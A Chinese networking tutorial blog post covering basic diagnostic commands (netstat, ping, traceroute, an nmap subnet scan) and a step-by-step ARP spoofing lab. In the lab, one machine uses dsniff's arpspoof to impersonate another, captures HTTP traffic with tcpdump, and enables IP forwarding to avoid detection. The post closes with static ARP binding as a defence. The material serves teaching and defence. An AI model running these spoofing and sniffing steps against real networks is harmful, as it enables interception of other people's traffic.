常见的测试命令及arp协议(arp欺骗实例)

常见的测试命令及arp协议(arp欺骗实例)

一.引子

即将开始网络服务的整理,技术这个东西,就是要不断积累,不断练习才能更强。在进入网络服务之前我们还是要先进行一些基础测试命令的学习,不然到时候报错都不知道哪里出了问题。

二.常见的网络服务测试命令

  • netstat -antp:查看本机端口信息(tcp协议端口状态)
  • ping:测试网络连通性(icmp协议)
  • traceroute :数据包追踪,可以记录当前主机至目标机器之间存在的网络设备(三层以上)R
    TTL:数据包的生存周期
    tracert: Windows平台
  • .nmap:网络探测扫描命令 nmap -sT(扫描tcp端口)
    测试步骤:
    1) 安装nmap:yum -y install nmap
    2.)扫描网段:nmap -sT 192.168.26.0/24

三.arp协议及arp欺骗实例

1.arp:地址解析协议
作用:将IP转化为MAC地址
格式:arp -s 目标IP地址 目标MAC地址
模型:arp欺骗模型

2.arp实验:13机器伪装成12机器攻击11机器

1.12:service httpd start
2.12:echo ”123” > /var/www/html/index.html(apache 默认网页文件)
3.12访问当前网页:curl localhost
4.11查询信息:arp -n 无法查询12mac信息
5.访问12 curl 192.168.26.12
6.11查询信息:arp -n 查询到12mac信息
7.13伪装成12
8.13安装伪装软件包:rz -e & ls & unzip dsniff.zip & ls & cd dsniff & yum -y install *
9.13:指定攻击对象(告诉11我是12):arpspoof -i eth0 -t 192.168.26.11 192.168.26.12
10.11 arp -n
11.11无法访问12,12mac地址改变
12.13查看截取信息:tcpdump -nA port 80
13.13为了不被发现更改配置文件:vim /etc/sysctl. conf 然后将ip_forward=0改为=1.(开启路由转发)
14.13刷新内核参数:sysctl -p
15.11curl可以访问12,但是arp查询到的mac地址依旧被欺骗。

3.解决arp欺骗方法
1)绑定mac地址:arp -s 192.168.26.12 mac物理地址
2)查询arp -n

网络服务前的预演环节,接下来,笔者将带领大家走进网络的海洋,去见识网络的乐趣。感谢大家的三连。

猜你喜欢

转载自blog.csdn.net/weixin_47678667/article/details/109034080